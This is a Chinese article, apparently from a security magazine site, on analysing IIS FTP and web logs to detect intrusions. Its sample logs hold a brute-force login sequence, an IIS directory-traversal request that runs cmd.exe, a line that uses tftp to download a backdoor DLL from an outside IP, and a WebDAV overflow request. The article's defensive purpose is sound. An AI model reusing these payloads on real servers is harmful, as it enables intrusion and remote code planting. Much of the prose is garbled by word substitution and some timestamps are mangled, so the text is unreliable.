快捷搜索:

如何利用日志分析抵制外部入侵

如今种种各样的Windows破绽层出不穷,五花八门的入侵对象更是令人目眩缭乱,轻细懂点收集常识的人都可以使用各类入侵对象进行入侵,这可给我们的网管带来了很大年夜的麻烦,虽然颠末精心设置设置设备摆设摆设的办事器可以抵御大年夜部分入侵,但跟着赓续新出的破绽,再高明的网管也不敢包管一台务器长光阴不会被侵入,以是,安然设置设置设备摆设摆设办事器并不能永世阻拦黑客入侵,而若何检测入侵者行动以包管办事器安然性就在这样的情 况下显得异常紧张。

日志文件作为微软Windows系列操作系统中的一个特殊文件,在安然方面具有无可替代的代价。它天天为我们忠厚地记录下系统所发生统统事故,使用它可以使系统治理员快速对潜在的系统入侵作出记录和猜测,但遗憾的是今朝绝大年夜多半的人都轻忽了它的存在,反而是由于黑客们惠临才会使我们想起这个紧张的系统日志文件,很有讥诮意味。

在这里我们就不去讲什么日志文件的默认位置、常见备份措施等基础技术了,这样的器械黑防曩昔讲得很清楚了,大年夜家可以翻看黑防曩昔的杂志进修这些器械,我们本日来看看若何阐发常见的日志文件吧!

FTP日志阐发

FTP日志和WWW日志在默认环境下,天生成成一个日志文件,包孕了该日的一牢记录,文件名平日为ex(年份)(月份)(日期)。例如ex040419,便是2004年4月19日孕育发生的日志,用记事本可直接打开,通俗的有入侵行径的日志一样平常是这样的:

#Software: Microsoft Internet Information Services 5.0(微软IIS5.0)

#Version: 1.0 (版本1.0)

#Date: 20040419 0315 (办事启动光阴日期)

#Fields: time cip csmethod csuristem scstatus

0315 127.0.0.1 [1]USER administator 331(IP地址为127.0.0.1用户名为administator试图登录)

0318 127.0.0.1 [1]PASS – 530(登录掉败)

032:04 127.0.0.1 [1]USER nt 331(IP地址为127.0.0.1用户名为nt的用户试图登录)

032:06 127.0.0.1 [1]PASS – 530(登录掉败)

032:09 127.0.0.1 [1]USER cyz 331(IP地址为127.0.0.1用户名为cyz的用户试图登录)

0322 127.0.0.1 [1]PASS – 530(登录掉败)

0322 127.0.0.1 [1]USER administrator 331(IP地址为127.0.0.1用户名为administrator试图登录)

0324 127.0.0.1 [1]PASS – 230(登录成功)

0321 127.0.0.1 [1]MKD nt 550(新建目录掉败)

0325 127.0.0.1 [1]QUIT – 550(退出FTP法度榜样)

从日志里就能看出IP地址为127.0.0.1的用户不停试图登录系统,换了四次用户名和密码才成功,治理员急速就可以得知这个IP至少有入侵妄图!而他的入侵光阴、IP地址以及探测的用户名都很清楚的记录在日志上。如上例入侵者终极是用 Administrator用户名进入的,那么就要斟酌此用户名是不是密码掉窃?照样被别人使用?接下来就要想想系统出什么问题了。

WWW日志阐发

WWW办事同FTP办事一样,孕育发生的日志也是在%systemroot%sys tem32LogFilesW3SVC1目录下,默认是天天一个日志文件。这里必要分外阐明一下,由于Web的日志和其另日志不合,它的阐发要细致得多,必要治理员有富厚的入侵、防护常识,并且要足够的细心,不然,很轻易漏掉那种很简单的日志,而平日这样的日志又是异常关键的。因为我们弗成能一个一个阐发,以是这里举个简单例子:

#Software: Microsoft Internet Information Services 5.0

#Version: 1.0

#Date: 20040419 03:091

我们共同入侵来看下这样的记录:经由过程下面的编码我们在入侵的时刻可以查看目标机的目录文件:

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

则日志中会记录下此造访行径:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir 200 -

看到了吗?我们的日志中记录地一览无余,来自192.168.0.1的进击者查看我们的目录。下面一行是向我们的机械传送后门法度榜样的日志记录:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll

502 –

看到了吧?记录异常具体的,系统里面那个法度榜样在相应都记录了下来,这样我们阐发入侵行径就好办了。

(2)WebDavx3远程溢出日志记录

以前一段光阴着名的Wevdavx3破绽是利用最广泛的,假如系统遭受了此远程溢出的进击行径,则日志记录如图二所示。

2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK

/AAAAA……

这表示我们的Web办事受到了来自192.168.0.218的进击,并锁定(即关闭)了WEB办事,后面的一些乱码字符是在溢出进击时应用的偏移位猜历程。

上面的几种日杂都记录了有入侵行径的IP地址,但此IP地址说不定便是进击者应用了跳板,也便是说此IP很可能是“肉鸡”而不是进击者的IP,碰到这样的环境,我们再查看其另日志文件,照样有可能追查出进击者的位置的,但这个就完全靠治理员的履历了。

您可能还会对下面的文章感兴趣: